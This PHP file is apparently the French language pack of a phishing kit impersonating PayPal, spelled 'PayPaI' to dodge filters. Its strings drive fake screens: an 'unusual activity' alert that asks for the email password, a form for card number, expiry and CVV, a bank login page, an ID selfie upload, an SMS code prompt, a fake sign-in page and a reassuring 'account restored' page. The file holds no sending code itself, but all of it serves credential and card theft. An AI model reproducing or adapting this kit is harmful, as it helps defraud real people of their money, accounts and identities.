<?php

// ALERT MSG - EMAIL PASS
	$xeon1 = "PayPaI";
	$xeon2 = "On a remarqué des activité inhabituelle";
	$xeon3 = "Nous avons besoin de votre aide pour sécuriser votre compte afin d'empêcher tout accès non autorisé. Pour votre sécurité, il peut y avoir des limitations sur votre compte jusqu'à ce que vous preniez des mesures.";
	$xeon4 = "Sécuriser mon compte";
	$xeon5 = "Confirmez votre boîte mail";
	$xeon6 = "Chaque fois nous obtenons de nouveaux moyens de sécurité pour protégé notre communauté";
	$xeon7 = "Adresse électronique";
	$xeon8 = "Mot de passe";
	$xeon9 = "Qu'est-ce que c'est?";
	$xeon10 = "Cette nouvelle sécurite que nous venons d'activer consiste de lié votre boite email et votre compte paypaI pour vous informez de tout activité inhabituelle";
	$xeon11 = "Sauvegarder et continuer";
	$xeon12 = "En traitement...";

// BILL - CC
	$xeon13 = "PayPaI";
	$xeon14 = "Confirmez vos informations";
	$xeon15 = "Veuillez vérifier  soigneusement vos informations personnelles  et vos informations de carte";
	$xeon16 = "Informations personnelles :";
	$xeon17 = "Nom complet";
	$xeon18 = "Date de naissance";
	$xeon19 = "Adresse de rue";
	$xeon20 = "Ville";
	$xeon21 = "Code postal";
	$xeon22 = "Numéro de téléphone";
	$xeon23 = "Numéro de carte";
	$xeon24 = "Date d'expiration";
	$xeon25 = "Cryptogramme";
	$xeon26 = "Qu'est-ce que c'est?";
	$xeon27 = "Le code de sécurité est les trois derniers chiffres du numéro imprimé sur la bande de signature au verso de votre carte.";
	$xeon28 = "Le code de sécurité est le numéro composé de 4 chiffres situé au dessus et a droite du longue numéro de carte";
	$xeon29 = "Sauvegarder et continuer";

// CC PASS
	$xeon30 = "Mot de passe de la carte";
	$xeon31 = "Date de naissance";
	$xeon32 = "Sauvegarder et continuer";

// BANK
	$xeon33 = "Liez votre compte bancaire";
	$xeon34 = "Associez votre compte bancaire pour envoyer de l'argent à vos amis de votre pays gratuitement.";
	$xeon35 = "Compte bancaire :";
	$xeon36 = "ID en ligne";
	$xeon37 = "Mot de passe";
	$xeon38 = "Type de compte";
	$xeon39 = "Individuelle";
	$xeon40 = "Entreprise";
	$xeon41 = "Numéro d'acheminement";
	$xeon42 = "Numéro de compte";
	$xeon43 = "En cliquant sur <b> Lié instantanément la banque </b>, vous acceptez d'utiliser votre association pour votre compte bancaire.";
	$xeon44 = "Lier et continuer";

// ID
	$xeon45 = "Je n'ai pas de compte bancaire";
	$xeon46 = "Confirmez votre vérification d'identité";
	$xeon47 = "Vérifiez votre identité pour plus de sécurité";
	$xeon48 = "Selfie avec votre carte d'identité";
	$xeon49 = "Faites glisser et déposez un fichier ou sélectionnez ajouter une image";
	$xeon50 = "Supprimer l'image";
	$xeon51 = "Confirmer";

// SMS
	$xeon52 = "Votre sécurité est notre priorité";
	$xeon53 = "Nous voulons juste confirmer que c'est vous";
	$xeon54 = "Recevoir SMS";
	$xeon55 = "Suivant";
	$xeon56 = "En poursuivant, vous confirmez que vous êtes autorisé à utiliser ce numéro de téléphone et acceptez de recevoir des SMS pour confirmer votre identité lors de cette session. Des frais peuvent être appliqués par l'opérateur.";
	$xeon57 = "Entrez votre code";
	$xeon58 = "Nous avons envoyé un code de sécurité à 6 chiffres à";
	$xeon59 = "Cryptogramme visuel";
	$xeon60 = "Confirmer";

// THANKS
	$xeon61 = "Votre compte a été restauré avec succès";
	$xeon62 = "<p class=\"xeonDescription\">Vous pouvez maintenant profiter de nos services, merci d'avoir choisi notre service de confiance.Votre compte sera vérifié dans les prochaines 24 heures.</p><p class=\"xeonDescription\">Vous êtes redirigé vers votre compte PayPaI.<br/>Dans les 5 secondes.</p>";

// LOGIN
	$xlog1 = "Connectez-vous à votre compte PayPaI";
	$xlogerror = "Veuillez vérifier vos entrées et réessayer.";
	$xlog2 = "Modifier";
	$xlog3 = "Email";
	$xlog4 = "Obligatoire";
	$xlog5 = "Le format de cette adresse email ou de ce numéro de mobile n'est pas correct";
	$xlog6 = "Suivant";
	$xlog7 = "Mot de passe";
	$xlog8 = "Afficher";
	$xlog9 = "Masquer";
	$xlog10 = "Connexion";
	$xlog11 = "Vous n'arrivez pas à vous connecter ?";
	$xlog12 = "ou";
	$xlog13 = "Ouvrir un compte";
	$xlog14 = "Respect de la vie privée";
	$xlog15 = "PayPaI";
	$xlog16 = "Copyright &copy; 1999-2020 PayPaI. Tous droits réservés.";
	
//FOOTER
	$foot1 = "Nous contacter";
	$foot2 = "Intimité";
	$foot3 = "Légal";
	$foot4 = "À l'échelle mondiale";


// COUNTRYS SELECT

	$country = '
<select name="xeonCtry" id="xeonCtry">
	<option value="" selected="selected" disabled="disabled">sélectionnez votre pays</option>
	<option value="Afrique du Sud">Afrique du Sud</option>
	<option value="Albanie">Albanie</option>
	<option value="Algérie">Algérie</option>
	<option value="Allemagne">Allemagne</option>
	<option value="Andorre">Andorre</option>
	<option value="Angola">Angola</option>
	<option value="Anguilla">Anguilla</option>
	<option value="Antigua-et-Barbuda">Antigua-et-Barbuda</option>
	<option value="Antilles néerlandaises">Antilles néerlandaises</option>
	<option value="Arabie saoudite">Arabie saoudite</option>
	<option value="Argentine">Argentine</option>
	<option value="Arménie">Arménie</option>
	<option value="Aruba">Aruba</option>
	<option value="Australie">Australie</option>
	<option value="Autriche">Autriche</option>
	<option value="Azerbaïdjan">Azerbaïdjan</option>
	<option value="Bahamas">Bahamas</option>
	<option value="Bahreïn">Bahreïn</option>
	<option value="Barbade">Barbade</option>
	<option value="Belgique">Belgique</option>
	<option value="Belize">Belize</option>
	<option value="Bénin">Bénin</option>
	<option value="Bermudes">Bermudes</option>
	<option value="Bhoutan">Bhoutan</option>
	<option value="Biélorussie">Biélorussie</option>
	<option value="Bolivie">Bolivie</option>
	<option value="Bosnie-Herzégovine">Bosnie-Herzégovine</option>
	<option value="Botswana">Botswana</option>
	<option value="Brésil">Brésil</option>
	<option value="Brunéi Darussalam">Brunéi Darussalam</option>
	<option value="Bulgarie">Bulgarie</option>
	<option value="Burkina Faso">Burkina Faso</option>
	<option value="Burundi">Burundi</option>
	<option value="Cambodge">Cambodge</option>
	<option value="Cameroun">Cameroun</option>
	<option value="Canada">Canada</option>
	<option value="Cap-Vert">Cap-Vert</option>
	<option value="Chili">Chili</option>
	<option value="Chine">Chine</option>
	<option value="Chypre">Chypre</option>
	<option value="Colombie">Colombie</option>
	<option value="Comores">Comores</option>
	<option value="Congo-Brazzaville">Congo-Brazzaville</option>
	<option value="Congo-Kinshasa">Congo-Kinshasa</option>
	<option value="Corée du Sud">Corée du Sud</option>
	<option value="Costa Rica">Costa Rica</option>
	<option value="Côte d’Ivoire">Côte d’Ivoire</option>
	<option value="Croatie">Croatie</option>
	<option value="Danemark">Danemark</option>
	<option value="Djibouti">Djibouti</option>
	<option value="Dominique">Dominique</option>
	<option value="Égypte">Égypte</option>
	<option value="El Salvador">El Salvador</option>
	<option value="Émirats arabes unis">Émirats arabes unis</option>
	<option value="Équateur">Équateur</option>
	<option value="Érythrée">Érythrée</option>
	<option value="Espagne">Espagne</option>
	<option value="Estonie">Estonie</option>
	<option value="État de la Cité du Vatican">État de la Cité du Vatican</option>
	<option value="États fédérés de Micronésie">États fédérés de Micronésie</option>
	<option value="États-Unis">États-Unis</option>
	<option value="Éthiopie">Éthiopie</option>
	<option value="Fidji">Fidji</option>
	<option value="Finlande">Finlande</option>
	<option value="France">France</option>
	<option value="Gabon">Gabon</option>
	<option value="Gambie">Gambie</option>
	<option value="Géorgie">Géorgie</option>
	<option value="Gibraltar">Gibraltar</option>
	<option value="Grèce">Grèce</option>
	<option value="Grenade">Grenade</option>
	<option value="Groenland">Groenland</option>
	<option value="Guadeloupe">Guadeloupe</option>
	<option value="Guatemala">Guatemala</option>
	<option value="Guinée">Guinée</option>
	<option value="Guinée-Bissau">Guinée-Bissau</option>
	<option value="Guyana">Guyana</option>
	<option value="Guyane française">Guyane française</option>
	<option value="Honduras">Honduras</option>
	<option value="Hongrie">Hongrie</option>
	<option value="Île Norfolk">Île Norfolk</option>
	<option value="Îles Caïmans">Îles Caïmans</option>
	<option value="Îles Cook">Îles Cook</option>
	<option value="Îles Féroé">Îles Féroé</option>
	<option value="Îles Malouines">Îles Malouines</option>
	<option value="Îles Marshall">Îles Marshall</option>
	<option value="Îles Pitcairn">Îles Pitcairn</option>
	<option value="Îles Salomon">Îles Salomon</option>
	<option value="Îles Turques-et-Caïques">Îles Turques-et-Caïques</option>
	<option value="Îles Vierges britanniques">Îles Vierges britanniques</option>
	<option value="Inde">Inde</option>
	<option value="Indonésie">Indonésie</option>
	<option value="Irlande">Irlande</option>
	<option value="Islande">Islande</option>
	<option value="Israël">Israël</option>
	<option value="Italie">Italie</option>
	<option value="Jamaïque">Jamaïque</option>
	<option value="Japon">Japon</option>
	<option value="Jordanie">Jordanie</option>
	<option value="Kazakhstan">Kazakhstan</option>
	<option value="Kenya">Kenya</option>
	<option value="Kirghizistan">Kirghizistan</option>
	<option value="Kiribati">Kiribati</option>
	<option value="Koweït">Koweït</option>
	<option value="La Réunion">La Réunion</option>
	<option value="Laos">Laos</option>
	<option value="Lesotho">Lesotho</option>
	<option value="Lettonie">Lettonie</option>
	<option value="Liechtenstein">Liechtenstein</option>
	<option value="Lituanie">Lituanie</option>
	<option value="Luxembourg">Luxembourg</option>
	<option value="Macédoine">Macédoine</option>
	<option value="Madagascar">Madagascar</option>
	<option value="Malaisie">Malaisie</option>
	<option value="Malawi">Malawi</option>
	<option value="Maldives">Maldives</option>
	<option value="Mali">Mali</option>
	<option value="Malte">Malte</option>
	<option value="Maroc">Maroc</option>
	<option value="Martinique">Martinique</option>
	<option value="Maurice">Maurice</option>
	<option value="Mauritanie">Mauritanie</option>
	<option value="Mayotte">Mayotte</option>
	<option value="Mexique">Mexique</option>
	<option value="Moldavie">Moldavie</option>
	<option value="Monaco">Monaco</option>
	<option value="Mongolie">Mongolie</option>
	<option value="Monténégro">Monténégro</option>
	<option value="Montserrat">Montserrat</option>
	<option value="Mozambique">Mozambique</option>
	<option value="Namibie">Namibie</option>
	<option value="Nauru">Nauru</option>
	<option value="Népal">Népal</option>
	<option value="Nicaragua">Nicaragua</option>
	<option value="Niger">Niger</option>
	<option value="Nigéria">Nigéria</option>
	<option value="Niue">Niue</option>
	<option value="Norvège">Norvège</option>
	<option value="Nouvelle-Calédonie">Nouvelle-Calédonie</option>
	<option value="Nouvelle-Zélande">Nouvelle-Zélande</option>
	<option value="Oman">Oman</option>
	<option value="Ouganda">Ouganda</option>
	<option value="Palaos">Palaos</option>
	<option value="Panama">Panama</option>
	<option value="Papouasie-Nouvelle-Guinée">Papouasie-Nouvelle-Guinée</option>
	<option value="Paraguay">Paraguay</option>
	<option value="Pays-Bas">Pays-Bas</option>
	<option value="Pérou">Pérou</option>
	<option value="Philippines">Philippines</option>
	<option value="Pologne">Pologne</option>
	<option value="Polynésie française">Polynésie française</option>
	<option value="Portugal">Portugal</option>
	<option value="Qatar">Qatar</option>
	<option value="R.A.S. chinoise de Hong Kong">R.A.S. chinoise de Hong Kong</option>
	<option value="République dominicaine">République dominicaine</option>
	<option value="République tchèque">République tchèque</option>
	<option value="Roumanie">Roumanie</option>
	<option value="Royaume">Royaume-Uni</option>
	<option value="Russie">Russie</option>
	<option value="Rwanda">Rwanda</option>
	<option value="Saint-Christophe-et-Niévès">Saint-Christophe-et-Niévès</option>
	<option value="Saint-Marin">Saint-Marin</option>
	<option value="Saint-Pierre-et-Miquelon">Saint-Pierre-et-Miquelon</option>
	<option value="Saint-Vincent-et-les-Grenadines">Saint-Vincent-et-les-Grenadines</option>
	<option value="Sainte-Hélène">Sainte-Hélène</option>
	<option value="Sainte-Lucie">Sainte-Lucie</option>
	<option value="Samoa">Samoa</option>
	<option value="Sao Tomé-et-Principe">Sao Tomé-et-Principe</option>
	<option value="Sénégal">Sénégal</option>
	<option value="Serbie">Serbie</option>
	<option value="Seychelles">Seychelles</option>
	<option value="Sierra Leone">Sierra Leone</option>
	<option value="Singapour">Singapour</option>
	<option value="Slovaquie">Slovaquie</option>
	<option value="Slovénie">Slovénie</option>
	<option value="Somalie">Somalie</option>
	<option value="Sri Lanka">Sri Lanka</option>
	<option value="Suède">Suède</option>
	<option value="Suisse">Suisse</option>
	<option value="Suriname">Suriname</option>
	<option value="Svalbard et Jan Mayen">Svalbard et Jan Mayen</option>
	<option value="Swaziland">Swaziland</option>
	<option value="Tadjikistan">Tadjikistan</option>
	<option value="Taïwan">Taïwan</option>
	<option value="Tanzanie">Tanzanie</option>
	<option value="Tchad">Tchad</option>
	<option value="Thaïlande">Thaïlande</option>
	<option value="Togo">Togo</option>
	<option value="Tonga">Tonga</option>
	<option value="Trinité-et-Tobago">Trinité-et-Tobago</option>
	<option value="Tunisie">Tunisie</option>
	<option value="Turkménistan">Turkménistan</option>
	<option value="Tuvalu">Tuvalu</option>
	<option value="Ukraine">Ukraine</option>
	<option value="Uruguay">Uruguay</option>
	<option value="Vanuatu">Vanuatu</option>
	<option value="Venezuela">Venezuela</option>
	<option value="Vietnam">Vietnam</option>
	<option value="Wallis-et-Futuna">Wallis-et-Futuna</option>
	<option value="Yémen">Yémen</option>
	<option value="Zambie">Zambie</option>
	<option value="Zimbabwe">Zimbabwe</option>
</select>
	';